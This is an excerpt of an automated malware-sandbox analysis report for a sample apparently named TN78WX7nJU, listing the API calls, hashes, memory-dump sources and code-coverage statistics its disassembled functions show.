                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0249296C
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492982
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02492990
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                • Instruction ID: 39b89da5196754ac7e66ba7afbf2fb2fdc32eb80da0eee6845f7c8a3fde144f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62E0C2305001057B8B14FBB99C48A7B36AC6A01B15B600B2BF861E20E0EBA8D1084AA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::critical_section::unlock.LIBCMT ref: 02492103
                                                                                                                                                                                                                                                                  • Part of subcall function 02491379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0249139A
                                                                                                                                                                                                                                                                  • Part of subcall function 02491379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024913D1
                                                                                                                                                                                                                                                                  • Part of subcall function 02491379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024913DD
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0249210F
                                                                                                                                                                                                                                                                  • Part of subcall function 02490CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02490D0E
                                                                                                                                                                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 02492114
                                                                                                                                                                                                                                                                  • Part of subcall function 02492EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02492ECA
                                                                                                                                                                                                                                                                • Concurrency::critical_section::lock.LIBCONCRT ref: 02492134
                                                                                                                                                                                                                                                                  • Part of subcall function 024912A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024912B0
                                                                                                                                                                                                                                                                  • Part of subcall function 024912A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024912BD
                                                                                                                                                                                                                                                                  • Part of subcall function 024912A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024912C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3659872527-0
                                                                                                                                                                                                                                                                • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                                                • Instruction ID: 973d6d2bc67f311d57f88afb361013f4fa19c512d9d9c37a7d4e5a4d430c6c5d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE04F35500506ABCF09FB62C56459CBF62BF85310B54434FD86A572E0CF746E4ACF94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C
                                                                                                                                                                                                                                                                  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
                                                                                                                                                                                                                                                                  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
                                                                                                                                                                                                                                                                  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8
                                                                                                                                                                                                                                                                  • Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7
                                                                                                                                                                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 00411EAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63
                                                                                                                                                                                                                                                                • Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD
                                                                                                                                                                                                                                                                  • Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
                                                                                                                                                                                                                                                                  • Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
                                                                                                                                                                                                                                                                  • Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3659872527-0
                                                                                                                                                                                                                                                                • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                                                • Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024BB32B,?,00000050,?,?,?,?,?), ref: 024BB1AB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                                                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                • Instruction ID: d82f5f31afa3fae170ceda9a83c7987e31ea26b755ebb3535ab00374713e52e8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB217F62A10105A6EB378F658D01BE772AAEF44BDDF4A8526ED09D7304E732D941C7B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                                                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                • String ID: image/png
                                                                                                                                                                                                                                                                • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                                • String ID: F(@
                                                                                                                                                                                                                                                                • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                                                • API String ID: 1687795959-2046700901
                                                                                                                                                                                                                                                                • Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
                                                                                                                                                                                                                                                                • Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                  • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                  • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                • String ID: F@
                                                                                                                                                                                                                                                                • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                                • String ID: zB$~B
                                                                                                                                                                                                                                                                • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                                                • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pThreadProxy
                                                                                                                                                                                                                                                                • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                                • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02482AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02482AAD,00000000), ref: 024AB187
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 024AB195
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02482AAD,00000000), ref: 024AB1F0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                • Instruction ID: bf93f079a537c6fe2134ac975e89092c4dfc72e2da7a6cff801ae4eda88185ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9410732600246AFDB218F65CC687BF7BB5EF71758F14426BEC599B2A0DB308901CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.3%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:45.5%
                                                                                                                                                                                                                                                                Signature Coverage:10.6%
                                                                                                                                                                                                                                                                Total number of Nodes:66
                                                                                                                                                                                                                                                                Total number of Limit Nodes:3
